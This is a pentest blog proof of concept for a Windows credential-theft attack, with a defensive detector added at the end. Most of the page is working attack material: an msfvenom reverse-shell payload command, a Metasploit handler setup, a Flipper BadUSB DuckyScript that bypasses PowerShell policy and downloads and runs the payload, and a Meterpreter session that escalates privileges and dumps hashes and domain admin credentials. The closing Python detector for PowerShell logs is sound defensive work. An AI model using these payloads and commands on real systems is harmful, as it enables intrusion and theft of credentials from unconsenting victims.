{{tag>english blog it-security pentest}}

====== FatCat Attack PoC ======

<code>
 _____     _    ____      _   
|  ___|_ _| |_ / ___|__ _| |_ 
| |_ / _` | __| |   / _` | __|
|  _| (_| | |_| |__| (_| | |_ 
|_|  \__,_|\__|\____\__,_|\__|
                    Attack PoC
</code>

| @orange:This PoC is for demonstration and training purposes only - misuse is a criminal offence((https://dejure.org/gesetze/StGB/202a.html)) |

===== Description =====

The objective is to extract the relevant SAM data from the registry. For this purpose the Flipper is used as a BadUSB device. The PowerShell execution policy is bypassed, and the required rights are obtained through a privilege escalation. The following data is to be exfiltrated:

^ User ^ Password ^ Hash ^
| Host \ User | | |
| Host \ Admin | | |
| Domain \ Admin | | |

===== Procedure =====

  - Deactivate AV
  - Create payload
  - Start handler
  - BadUSB attack
  - Use remote shell to explore
  - Search for exploit
  - Apply exploit
  - Collect credentials

===== Documentation =====

^ Attack Chain Step ^ Attack Technique ^ Attack Tool ^
| @#D0FA58:**Weaponisation** | Exploit, Payload | msfvenom((https://github.com/ksanchezcld/Hacking_Cheat_Sheet/blob/master/msfvenom)) |
| @#FACC2E:**Delivery** | Physical access, Injection | Flipper((https://flipperzero.one/)), BadUSB((https://grantonline.medium.com/flipper-zero-badusb-getting-started-with-duckyscript-f212fcdd5dec)) |
| ::: | Bypass | PowerShell Restrictions((https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/)) |
| @#2E9AFE:**Exploitation** | Reverse Shell | Metasploit((https://www.hackers-arise.com/post/2017/07/31/metasploit-basics-part-9-using-msfvenom-to-create-custom-payloads)) |
| ::: | Enumeration | **Enumerate System Info** JAWS((https://github.com/411Hall/JAWS)), SessionGopher((https://github.com/Arvanaghi/SessionGopher)), weak Service Permissions((https://fuzzysecurity.com/tutorials/16.html)), Primary Access Token Manipulation((https://www.ired.team/offensive-security/privilege-escalation/t1134-access-token-manipulation)), Unquoted Service Path((https://www.ired.team/offensive-security/privilege-escalation/unquoted-service-paths)), PassTheHash((https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/README.md)) ((https://www.ired.team/offensive-security/privilege-escalation/pass-the-hash-privilege-escalation-with-invoke-wmiexec)), BetterSafetyKatz (built locally, obfuscation not complete), Search for local Exploits((https://null-byte.wonderhowto.com/how-to/get-root-with-metasploits-local-exploit-suggester-0199463/)) |
| ::: | Privilege Escalation((https://github.com/frizb/Windows-Privilege-Escalation)) | AlwaysInstallElevated((https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated)) |
| @#58D3F7:**Actions on Objectives** | Exfiltration | Exfiltrate Data |

===== Preparations and attack =====

==== Metasploit payload ====

  * Start Metasploit
  * Open cmd
<code>
cmd
</code>
  * Generate payload
<code>
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.2.77 LPORT=50666 -e x86/shikata_ga_nai -i 5 -f exe > msfpayload.exe
</code>
  * Exit shell
<code>
exit
</code>
  * Store payload on a web server

[{{it-security:blog:002-fc-msfvenom.png?400|Generate payload}}]

==== Metasploit Handler ====

  * Start Multi Handler Server
<code>
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.77
set LPORT 50666
exploit
</code>

[{{it-security:blog:001-fc-handler.png?400|Configure and start Metasploit Handler}}]

==== Access to the target system ====

  * The Flipper executes the following DuckyScript on the target system
<code>
WINDOWS r
DELAY 2000
STRING powershell.exe
DELAY 3000
ENTER
DELAY 5000
STRING Set-ExecutionPolicy Bypass -Scope Process -force
DELAY 3000
ENTER
DELAY 3000
STRING irm https:///msfpayload.exe -OutFile msfpayload.exe
DELAY 3000
ENTER
DELAY 5000
STRING Start-Process msfpayload.exe
DELAY 3000
ENTER
DELAY 3000
STRING exit
DELAY 1500
ENTER
</code>

[{{it-security:blog:003-fc-flipperattack.png?400|Flipper attack is executed}}]

==== Connection established - Metasploit does it ====

<code>
getsystem
hashdump
ls
getwd
cd c:
cd Glob_Share
ls
background
use post/multi/recon/local_exploit_suggester
sessions
set session 1
run
use exploit/windows/local/always_install_elevated
set session 1
exploit
cd glob_share
type Domain-Admin-Creds.txt
hashdump
sessions -i 1
</code>

[{{it-security:blog:004-fc-session.png?400|Meterpreter session established}}]
[{{it-security:blog:005-fc-exploitsearch.png?400|Automated exploit search for privilege escalation}}]
[{{it-security:blog:006-fc-privesc.png?400|Privilege escalation successful}}]
[{{it-security:blog:007-fc-creds.png?400|The credentials we were looking for}}]
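From the defender's side, the DuckyScript above leaves a distinctive trace in PowerShell script block logging (Event ID 4104): an execution-policy bypass, a download cradle with ''-OutFile'' and a ''Start-Process'' of the dropped file, all typed within seconds. The following Python detector is an added example, not part of the original PoC; the event records, host names and the ''example.invalid'' URL are constructed.

```python
"""Flag the PowerShell stage of the BadUSB chain in script block logs (Event ID 4104).

Each record is a simplified 4104 event: timestamp, host and the script block text.
Three stages of the injected DuckyScript are matched and correlated per host.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

STAGES = {
    "execpolicy_bypass": re.compile(r"Set-ExecutionPolicy\s+(Bypass|Unrestricted)", re.I),
    "download_cradle": re.compile(r"\b(irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\b.*-OutFile", re.I),
    "launch_dropped_file": re.compile(r"Start-Process\s+\S+\.exe", re.I),
}
WINDOW = timedelta(seconds=60)  # typed by a BadUSB device, the stages land seconds apart


def classify(script_text):
    """Return the names of all stages whose pattern matches this script block."""
    return [name for name, rx in STAGES.items() if rx.search(script_text)]


def detect(events, window=WINDOW):
    """One alert per host on which at least two distinct stages occur within `window`."""
    by_host = defaultdict(list)
    for ev in events:
        for stage in classify(ev["script"]):
            by_host[ev["host"]].append((datetime.fromisoformat(ev["when"]), stage))
    alerts = []
    for host, hits in sorted(by_host.items()):
        hits.sort()  # chronological; each hit is (timestamp, stage name)
        for i, (t0, _) in enumerate(hits):
            stages = {s for t, s in hits[i:] if t - t0 <= window}
            if len(stages) >= 2:
                alerts.append({"host": host, "first_seen": t0.isoformat(), "stages": sorted(stages)})
                break  # one alert per host is enough for triage
    return alerts


# Constructed sample events (not real telemetry); only WS01 shows the full chain.
SAMPLE_EVENTS = [
    {"when": "2024-01-10T09:00:01", "host": "WS01", "script": "Set-ExecutionPolicy Bypass -Scope Process -force"},
    {"when": "2024-01-10T09:00:05", "host": "WS01", "script": "irm https://example.invalid/msfpayload.exe -OutFile msfpayload.exe"},
    {"when": "2024-01-10T09:00:12", "host": "WS01", "script": "Start-Process msfpayload.exe"},
    {"when": "2024-01-10T09:30:00", "host": "WS02", "script": "Get-Process"},
    {"when": "2024-01-10T10:00:00", "host": "WS03", "script": "Set-ExecutionPolicy Bypass -Scope Process"},
]
```

A single stage on its own (WS03) is common admin activity and produces no alert; the correlation window is what separates the BadUSB sequence from everyday use.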